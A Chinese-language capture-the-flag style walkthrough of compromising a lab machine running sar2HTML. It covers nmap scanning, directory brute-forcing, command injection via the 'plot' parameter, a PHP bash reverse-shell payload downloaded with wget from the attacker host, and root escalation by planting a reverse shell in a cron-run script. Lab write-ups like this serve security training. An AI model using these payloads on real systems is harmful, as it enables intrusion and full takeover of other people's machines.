主机发现

sudo nmap -sn 192.168.28.0/24

TCP端口扫描:sudo nmap -sT --min-rate 10000 -p- 192.168.28.35 -oA nmapscan/ports

端口tcp扫描sudo nmap -sT -sV -sC -O -p80 192.168.28.35 -oA nmapscan/detial

端口udp扫描sudo nmap -sU --top-ports 20 192.168.28.35 -oA nmapscan/udp

脆弱性扫描　sudo nmap --script=vuln -p80 192.168.28.35 -oA nmapscan/vuln

访问http服务

并进行目录爆破

sudo dirb -u http:/xx -w xx

发现robots.txt和phpinfo.php 

phpinfo.php一般用于进行针对性的爆破等等

robots.txt一般用于禁止目录访问和目录导览的,所以里面存放的一些有可能是目录的名字

访问robots.txt发现只有sar2HTML,将它当成目录放入路径中

http://192.168.28.35/sar2HTML

成功访问

发现是一个软件

通过searchsploit漏洞库查找是否有这个漏洞

search sar2html　　找到一个rce,但是因为search容易将数字当成关键字搜索,所以一般要将数字给去掉

search sar -m 47204　　#将rce给拖下到当前路径下 

查看用法

 访问http://192.168.28.35/index.php?plot=;cat /etc/passwd 

鼠标点击select host 命令执行结果会输出到底部的滑动上

所以进行写马反弹shell的操作

反弹shell

vim shell.txt

<?php exec("/bin/bash -c ' bash -i >& /dev/tcp/192.168.28.29/1234 0>&1'");?>

kali监听

nc -lvnp 1234 并开放一个web服务 sudo php -S 0:80

利用漏洞进行远程下载并执行

http://192.168.28.35/sar2HTML/index.php?plot=;wget http://192.168.28.29/shell.txt -O shell.php

再访问shell.php既可以反弹shell

http://192.168.28.35/sar2HTML/shell.php

成功getshell

权限分析

whoami 　　uname -a 　　ip a 　　sudo -l 

完善shell的交互性

clear --报错

export term=xterm-color

clear --成功

sudo -l 报错

简单翻一下目录

家目录等等

查看计划任务

cat /etc/crontab

查看到用root运行了finally的脚本.脚本指向write.sh 查看write.sh的用户属主是谁进行修改操作

将我们上传的shell.txt内的内容复制到write.sh中可以运行后既可以提权

vi write.sh

#!/bin/bash

/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.28.35/1111 0>&1